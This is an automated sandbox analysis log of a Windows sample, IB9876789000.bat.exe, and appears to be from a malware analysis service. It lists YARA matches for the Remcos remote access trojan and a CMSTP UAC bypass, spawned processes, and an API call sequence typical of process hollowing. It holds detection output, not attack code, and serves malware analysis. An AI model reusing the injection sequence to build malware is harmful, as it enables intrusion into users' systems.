                    Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Process Stats: CPU usage > 49%
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00401806 NtdllDefWindowProc_W
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_004018C0 NtdllDefWindowProc_W
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_004016FD NtdllDefWindowProc_A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_004017B7 NtdllDefWindowProc_A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00402CAC NtdllDefWindowProc_A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00402D66 NtdllDefWindowProc_A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Code function: 0_2_00007FF848B63140
Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Code function: 0_2_00007FF848B6BD1A
Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Code function: 0_2_00007FF848B62A2C
Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Code function: 0_2_00007FF848B6A891
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0041D071
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_004520D2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0043D098
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00437150
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_004361AA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00426254
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00431377
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0043651C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0041E5DF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0044C739
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_004367C6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_004267CB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0043C9DD
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00432A49
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00436A8D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0043CC0C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00436D48
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00434D22
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00426E73
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00440E20
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0043CE3B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00412F45
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00452F00
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00426FAD
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_10017194
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_1000B5C1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0044B040
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0043610D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00447310
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0044A490
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0040755A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0043C560
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0044B610
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0044D6C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_004476F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0044B870
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0044081D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00414957
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_004079EE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00407AEB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0044AA80
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00412AA9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00404B74
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00404B03
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_0044BBD8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00404BE5
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00404C76
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00415CFE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00416D72
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00446D30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00446D8B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00406E8F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_00405038
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0041208C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_004050A9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0040511A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0043C13A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_004051AB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_00449300
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0040D322
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0044A4F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0043A5AB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_00413631
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_00446690
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0044A730
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_004398D8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_004498E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0044A886
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0043DA09
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_00438D5E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_00449ED0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_0041FE83
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 14_2_00430F54
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_004050C2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_004014AB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00405133
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_004051A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00401246
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_0040CA46
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00405235
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_004032C8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00401689
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00402F60
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 00401F66 appears 50 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 00433FB0 appears 55 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 004020E7 appears 40 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 004338A5 appears 41 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: String function: 00416760 appears 69 times
Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1220 -s 1600
Source: IB9876789000.bat.exe | Static PE information: No import functions for PE file found
Source: IB9876789000.bat.exe, 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEjeyuvijuqoyi2 vs IB9876789000.bat.exe
Source: IB9876789000.bat.exe | Binary or memory string: OriginalFilenamePatekPorot.exe4 vs IB9876789000.bat.exe
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: IB9876789000.bat.exe | Static PE information: Section: .rsrc ZLIB complexity 0.9994467338217338
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/15@1/2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
